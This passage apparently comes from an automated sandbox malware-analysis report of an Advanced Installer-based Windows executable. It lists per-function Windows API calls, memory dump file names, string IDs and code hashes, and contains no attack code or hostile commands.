                                                    Function 003779F0 Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003779FB
                                                    • SendMessageW.USER32(?,?,?,0000102B), ref: 00377A58
                                                    • SendMessageW.USER32(?,?,?,0000102B), ref: 00377AA7
                                                    • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 00377AB8
                                                    • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00377AC5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 86d367e1ca05d1e1a2831bcbf444986944f6ecb5fdb3983e2f1293756770dd92
                                                    • Instruction ID: 1c6c15f5c7e8d1310da0c635bc9c8f017a1514a42aa6b6057f52ca42e14a7c95
                                                    • Opcode Fuzzy Hash: 86d367e1ca05d1e1a2831bcbf444986944f6ecb5fdb3983e2f1293756770dd92
                                                    • Instruction Fuzzy Hash: F5215171918346AAE320DF11CD45B1ABBF1BFED758F206B0EF1D4211A4E7F192848E86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00383A00 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 314windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,RichEdit20W,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00383BAC
                                                    • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00383BC1
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00383BC9
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$AllocateCreateHeapWindow
                                                    • String ID: RichEdit20W
                                                    • API String ID: 2359350451-4173859555
                                                    • Opcode ID: 72d1a8d7bb12ae50316d93630cd7fa7fd440293f3233a2d8174b4c0de657dd41
                                                    • Instruction ID: 6177d5271dfb65afb95ced5af23e07e68a21dbac06e229ce266942ec57a09808
                                                    • Opcode Fuzzy Hash: 72d1a8d7bb12ae50316d93630cd7fa7fd440293f3233a2d8174b4c0de657dd41
                                                    • Instruction Fuzzy Hash: 2FB18C71A002099FDB15DFA8C884BEEBBB5FF48710F14416DE945AB391DB75AD00CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00363AB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 231windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 00363B26
                                                    • SendMessageW.USER32(?,00000000,00000000), ref: 00363C22
                                                      • Part of subcall function 00365580: SysFreeString.OLEAUT32(00000000), ref: 00365623
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CreateFreeMessageSendStringWindow
                                                    • String ID: AtlAxWin140$Kc
                                                    • API String ID: 4045344427-1714451657
                                                    • Opcode ID: 5676b37a49e24416baeb4dc9851b29450781aaf7e4ed6b2c1f8b50063d3b92b1
                                                    • Instruction ID: 5e0b3ceaf154e0450ae6ddb30edcabdc5412eed4b26f35418db969156e3b2c03
                                                    • Opcode Fuzzy Hash: 5676b37a49e24416baeb4dc9851b29450781aaf7e4ed6b2c1f8b50063d3b92b1
                                                    • Instruction Fuzzy Hash: 19913774600205EFDB14DF68C888F9ABBB9FF49724F148598F8199B395DB71EA01CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00364300 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 169registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0045E190: GetModuleFileNameW.KERNEL32(00000000,?,00000400,D13B3340), ref: 0045E1ED
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,00000000,Xw,80000001,00000001,00000000,?,D13B3340), ref: 00364392
                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00364423
                                                    • RegCloseKey.ADVAPI32(00000000,D13B3340,?,?,00000000,0054ADC3,000000FF), ref: 00364502
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Close$FileModuleNameQueryValue
                                                    • String ID: Xw
                                                    • API String ID: 3856985302-1285161449
                                                    • Opcode ID: d6c5e9ad8db28662afe0bdd28089206e77d1f07c5aa4d62f71f6c04389369ea2
                                                    • Instruction ID: 7b0a302138506fd75bae0729c40248d73f2aa55487e8a0561b7c9f79cd8c9567
                                                    • Opcode Fuzzy Hash: d6c5e9ad8db28662afe0bdd28089206e77d1f07c5aa4d62f71f6c04389369ea2
                                                    • Instruction Fuzzy Hash: 80518A70E00248DBDB25DFA4CC59BEEBBB9FB04714F20865DE515AB280DF746A48CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0049F520 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • CloseHandle.KERNEL32(?,D13B3340,000000C9,00000000), ref: 0049F6A3
                                                    • DeleteCriticalSection.KERNEL32(?,D13B3340,000000C9,00000000), ref: 0049F731
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                    • String ID: << Advanced Installer (x86) Log >>$<3[
                                                    • API String ID: 3699736680-476628342
                                                    • Opcode ID: e13f225ac9d1ae8ce0b9dcc144dd7d8e335f5449029f1d880a353ca9c1e21130
                                                    • Instruction ID: cad519df82b0782395664e14dad90ca34f96a80d006c8141e2528a22a4490986
                                                    • Opcode Fuzzy Hash: e13f225ac9d1ae8ce0b9dcc144dd7d8e335f5449029f1d880a353ca9c1e21130
                                                    • Instruction Fuzzy Hash: 6161A070905646DFDB01CF68C948B5ABBF5FB45318F1482A9E8019B392DBB49909CBE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004B06E0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 167synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF,D13B3340), ref: 004B0714
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,00000000,00000000,?,?,006394D0,004A03D0,?), ref: 00456288
                                                      • Part of subcall function 00456270: MultiByteToWideChar.KERNEL32(00000003,00000000,80000004,000000FF,?,-00000001), ref: 004562BA
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
                                                    • String ID: *.*$.jar$.pack
                                                    • API String ID: 2019434529-3892993289
                                                    • Opcode ID: 18fb8ae3ee7fe0153b2d0a317cef919db538a76bd4a4e38d9baf159d6762eadb
                                                    • Instruction ID: e2f32cca379cd693555ebad87e3c71cd634045dc9b6a3731c8426050db9ea06a
                                                    • Opcode Fuzzy Hash: 18fb8ae3ee7fe0153b2d0a317cef919db538a76bd4a4e38d9baf159d6762eadb
                                                    • Instruction Fuzzy Hash: C5516270A016169FDB10DFA9C848BAFF7B4FF44315F14426AE425A7391DB38E905CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004A5AB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • GetLastError.KERNEL32(?,00000000,FTP Server,0000000A), ref: 004A5B34
                                                    • WaitForSingleObject.KERNEL32(?,0000000A,?,00000000,FTP Server,0000000A), ref: 004A5B6D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Init_thread_footer$ErrorHeapLastObjectProcessSingleWait
                                                    • String ID: REST %u$mT
                                                    • API String ID: 1670056567-277687540
                                                    • Opcode ID: cb8416252cdef2e4eb898d04be4220be4c94c33f2cc78372432a0d157df622d8
                                                    • Instruction ID: 116c2469510935b80e6c2b360b00bd64200c534939f013e7f0be3849280ee66f
                                                    • Opcode Fuzzy Hash: cb8416252cdef2e4eb898d04be4220be4c94c33f2cc78372432a0d157df622d8
                                                    • Instruction Fuzzy Hash: FE51E271600B04AFD720CF68CD48B2AB7E5FF62325F14462AE4168B7A1DB78F804CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046C6E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNEL32(?,00000000,?,\\?\,00000004,?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?), ref: 0046C783
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • DeleteFileW.KERNEL32(?,D13B3340,?,76B7F9C0,?,00000000,005848ED,000000FF,?,0046C527), ref: 0046C7B2
                                                    • GetLastError.KERNEL32(?,?,?,00000000,005848ED,000000FF,?,80004005,D13B3340,?,?,?,?,005848ED,000000FF), ref: 0046C7C2
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DeleteFileInit_thread_footer$ErrorFindHeapLastProcessResource
                                                    • String ID: \\?\
                                                    • API String ID: 1908169709-4282027825
                                                    • Opcode ID: 4b6d8e8d36d7a9f00fe9e540266c83198df41e9b05c97a3367c82484c1008b2b
                                                    • Instruction ID: 2fabe3c4df18197d014b0be37be0876f26e50213703ac8fb416b6a3967230968
                                                    • Opcode Fuzzy Hash: 4b6d8e8d36d7a9f00fe9e540266c83198df41e9b05c97a3367c82484c1008b2b
                                                    • Instruction Fuzzy Hash: 88219175900615DFD710DF68C848B7AB7F4FF05322F10465AE8A1D7390EB3999049F95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00360610 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00360652
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00360658
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RoOriginateLanguageException$combase.dll
                                                    • API String ID: 2574300362-3996158991
                                                    • Opcode ID: 9e25eaa05497011f806337851e61599cb0b5015a664ef45fe9b9275082746248
                                                    • Instruction ID: 37ffa732b2d20e77008c5cd2be27fd1aef1973255737e0d353fa8ac7628db8fb
                                                    • Opcode Fuzzy Hash: 9e25eaa05497011f806337851e61599cb0b5015a664ef45fe9b9275082746248
                                                    • Instruction Fuzzy Hash: A7317C71904249AFDB25DF68C906BEEBBF4FF04314F10862AE825A72D0EB745A44CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040F120 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000004), ref: 0040F16A
                                                    • DestroyWindow.USER32(00000004,?,?,?,?,?,?,?,?,000000FF), ref: 0040F177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Destroy
                                                    • String ID: T$\$|$\
                                                    • API String ID: 3707531092-3399885332
                                                    • Opcode ID: 9389c3a9bff2cf8ce7e7cb80b0d44be020755a3f203b2138ec1fa1d7e2d7ebaa
                                                    • Instruction ID: 07991acb120de43396aac1e77495314fba13c718cca5540311ac17d1068ea3f4
                                                    • Opcode Fuzzy Hash: 9389c3a9bff2cf8ce7e7cb80b0d44be020755a3f203b2138ec1fa1d7e2d7ebaa
                                                    • Instruction Fuzzy Hash: CB319A70804689EFCB15DF68C904B8EFBF4FF14314F1086ADD455AB691CBB4AA08CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0051DAC5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Cnd_broadcastCurrentMtx_unlockThread
                                                    • String ID: xc
                                                    • API String ID: 2021000804-3614201728
                                                    • Opcode ID: f0d9f1ac06488f17d879ae10f61660f7bab0ff0819b7e16a0af23850ac55ccb3
                                                    • Instruction ID: f295b0b61a0f4b3d7162d327b6f75a7fe38e162b7e5e91e7d61fb2325ceec202
                                                    • Opcode Fuzzy Hash: f0d9f1ac06488f17d879ae10f61660f7bab0ff0819b7e16a0af23850ac55ccb3
                                                    • Instruction Fuzzy Hash: 3901BC35604703ABFB21AF69C855AEABBB5FF80351F110438E41697240DB71EC80CBB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00524C0C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00524BBD,?,?,00000000,?,?,?,00524CE7,00000002,FlsGetValue,005A9F08,FlsGetValue), ref: 00524C19
                                                    • GetLastError.KERNEL32(?,00524BBD,?,?,00000000,?,?,?,00524CE7,00000002,FlsGetValue,005A9F08,FlsGetValue,?,?,00521B04), ref: 00524C23
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00524C4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    • Opcode ID: e74db0ee1a9d51235be7996f7e172b0211827d4945aba3d8d94200d600632594
                                                    • Instruction ID: 9870738645d72b1ac9fc03376430693e1a3ba3d6a35565d5e666b390dd9807eb
                                                    • Opcode Fuzzy Hash: e74db0ee1a9d51235be7996f7e172b0211827d4945aba3d8d94200d600632594
                                                    • Instruction Fuzzy Hash: E1E04830240254B7EF101B55FC0EBAD3F59BF12B95F144020FA0CB40F5EBB19D58AA45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00376E30 Relevance: 6.3, APIs: 4, Instructions: 321windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 00376F78
                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 00376F8D
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0044BAD0: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00376FC8,00000000,80004005), ref: 0044BB38
                                                      • Part of subcall function 0044BAD0: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0044BB68
                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 003770C3
                                                    • SendMessageW.USER32(?,00001061,00000000,00000005), ref: 003771BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$AllocateHeapWindow
                                                    • String ID:
                                                    • API String ID: 3168177373-0
                                                    • Opcode ID: 1b5c6a8bb6254998a62b5388cd8425c5655d7459b8c9f01d5fa5c3286d358950
                                                    • Instruction ID: 1d4ae3b4708a6ab41a8d7f56cb103ba367892ad2a5f98c1c4f74c5450a31dc6e
                                                    • Opcode Fuzzy Hash: 1b5c6a8bb6254998a62b5388cd8425c5655d7459b8c9f01d5fa5c3286d358950
                                                    • Instruction Fuzzy Hash: 7FC1B171A00609DFDB19DFA8CC99BEEFBB5FF48314F104219E415AB291DB74A944CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00380570 Relevance: 6.2, APIs: 4, Instructions: 246windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000001,0000110A,00000004,?), ref: 00380645
                                                    • SendMessageW.USER32(00000001,0000110A,00000001,00000000), ref: 00380677
                                                    • SendMessageW.USER32(?,0000110A,00000004,?), ref: 003807EE
                                                    • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00380816
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
